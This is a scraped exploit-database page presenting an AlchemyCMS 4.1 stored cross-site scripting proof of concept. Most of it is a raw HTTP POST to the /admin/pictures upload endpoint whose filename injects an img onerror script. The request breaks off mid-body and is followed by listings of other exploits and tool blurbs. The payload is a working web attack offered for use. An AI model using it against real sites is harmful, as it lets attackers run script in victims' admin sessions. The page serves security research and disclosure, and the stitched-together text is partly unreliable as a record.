Search for hundreds of thousands of exploits

"AlchemyCMS 4.1 - Cross-Site Scripting"

Author

Exploit author

"Ismail Tasdelen"

Platform

Exploit platform

ruby

Release date

Exploit published date

2018-10-15

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# Exploit Title: AlchemyCMS 4.1 - Cross-Site Scripting
# Date: 2018-10-14 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://alchemy-cms.com/
# Software Link : https://github.com/AlchemyCMS/alchemy_cms
# Software : AlchemyCMS
# Version : 4.1-stable
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A

# A Stored XSS vulnerability has been discovered in version 4.1.0 of AlchemyCMS via the /admin/pictures image field.
 
# HTTP POST Request :

POST /admin/pictures HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/admin/pages/80/edit
X-CSRF-Token: E6zZ6vohGua9Q0arzQVTUTmq/fJw48xBnkmfQeYxILYtmRAhDcxkaV5FeGyajgOtSXMs7r9xms7Wo44PEP9HTg==
X-Requested-With: XMLHttpRequest
Content-Length: 1574870
Content-Type: multipart/form-data; boundary=---------------------------10875577401849011681645409128
Cookie: _alchemy_demo_session=%2BSKdSGUIZALtIkYucZKu36eXcVTh4kSCFKjcxqLyFnd%2B5C87xtdx6%2B4Zkjy31YpXRzXI1nwu3BsIvI9v6eYio%2BOh1S3Kb1wd3YcARJTGJeK8ByX9N45trldIwmxK09FqDTMv897K3%2F%2Fe05YiJUEwz2jGkuXkiaxk37AHmjuJNtSNwLfGwAakOWN%2FKQvqAbl%2BMWV9crpeUuq66p6%2Bar1WmGmRcNDqUcfnDFfLmNa8%2BlCBNjieI5N0kpAv2xBJ30EZqoxee13TmKhvPoU4m3UehLKToa8gW5tCQQy7N3BF6ipZa5H1l16%2FxzwPEJl37F3T5%2F%2FkFr4JOxtYSiH9Nd1itpJjMBSZkGAou49SZoBq%2F23r%2BbENN81HrstL2TlaHkxeFdivOnAjBgwpst1qj570WU22FOQeKo80fWnARs23lCHAJy2RyY8dENcpagIQUgdbxqlCaEDqcUnnroZj0g8mhjG%2FdD2cLdym3usSVBmLoiVIPTcHf5T%2FavLUpF6PC0hUwgNEwgNZKzunlPl8tr17e9t9--RjgT8BiSM30kK4WY--s%2BPgcdnz62DCJTK14z5aag%3D%3D; __atuvc=3%7C42; __atuvs=5bc38ae909d900c3002
Connection: close

-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="utf8"

รขยœย“
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="authenticity_token"

GqjmyJ8FM+6rE6IIK5Or6Znszlg8ilvkUKsYJsqT3l3Cl7GAKn8L6xoCio55o9IaxztHwOKOSsRHz5vb4LTOGA==
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="picture[upload_hash]"

2507832911685091350
-----------------------------10875577401849011681645409128
Content-Disposition: form-data; name="picture[image_file]"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-01-31"FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)"webappsphp"Ismail Tasdelen"
2020-01-17"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-17"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-16"Tautulli 2.1.9 - Denial of Service ( Metasploit )"webappsmultiple"Ismail Tasdelen"
2020-01-15"Huawei HG255 - Directory Traversal ( Metasploit )"webappshardware"Ismail Tasdelen"
2020-01-14"IBM RICOH InfoPrint 6500 Printer - HTML Injection"webappshardware"Ismail Tasdelen"
2020-01-14"IBM RICOH 6400 Printer - HTML Injection"webappshardware"Ismail Tasdelen"
2020-01-13"SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-13"TaskCanvas 1.4.0 - 'Registration' Denial Of Service"doswindows"Ismail Tasdelen"
2020-01-13"Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-13"SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Tasdelen"
2020-01-06"RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotIM 2.2 - 'Name' Denial Of Service"doswindows"Ismail Tasdelen"
2020-01-06"BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service"doswindows"Ismail Tasdelen"
2020-01-06"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting"webappshardware"Ismail Tasdelen"
2019-12-30"XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)"webappshardware"Ismail Tasdelen"
2019-12-30"RICOH SP 4510SF Printer - HTML Injection"webappshardware"Ismail Tasdelen"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45601/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.